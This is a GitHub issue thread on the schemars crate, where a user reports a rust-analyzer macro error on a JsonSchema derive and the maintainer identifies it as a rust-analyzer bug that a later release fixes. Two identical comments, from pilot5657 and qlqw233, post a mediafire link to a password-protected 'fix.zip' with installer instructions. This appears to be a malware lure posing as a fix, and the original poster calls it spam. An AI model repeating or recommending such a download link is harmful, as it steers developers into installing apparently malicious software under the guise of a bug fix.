### ISSUE TITLE
Rust-analyzer lsp server now gives me macro error

### ISSUE THREAD

**Issue by miseyu** [GREsau/schemars#329]
## Overview
* Starting with this version, the following codes will generate an error
https://github.com/rust-lang/rust-analyzer/releases/tag/2024-08-26

```
unexpected token rust-analyzer[macro-error](https://rust-analyzer.github.io/manual.html#macro-error)
```

``` rust
#[derive(Serialize, Deserialize, Debug, Clone, JsonSchema)]
#[serde(rename_all = "camelCase")]
pub(super) struct Operation {
    pub(super) attribute: String,
    pub(super) method: Method,
    pub(super) value: Option<Expr>,
}
```

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by miseyu** [comment]
It looks like spam and I would like you to block it.

**Comment by GREsau** [comment]
I can reproduce this with both schemars 0.8 and 1.0.0-alpha, but only when using rust-analyzer v0.3.2086. When replacing the derive with the code that it expands to, rust-analyzer has no problems parsing it, which suggests to me that this is a bug in rust-analyzer.

I've raised this as an issue in rust-analyzer here: https://github.com/rust-lang/rust-analyzer/issues/17968

For now, the only workaround I can suggest is to downgrade rust-analyzer to the previous version (v0.3.2078), which does not have this problem.

**Comment by miseyu** [comment]
@GREsau 
Thank you for your confirmation! Also, thanks for creating the issue!
The compilation passes, so there is no problem once it is done!
CI will try to support it by lowering the version.
Thank you for your patience!

**Comment by GREsau** [comment]
rust-analyzer v0.3.2089 is now available which no longer has this problem 🙂
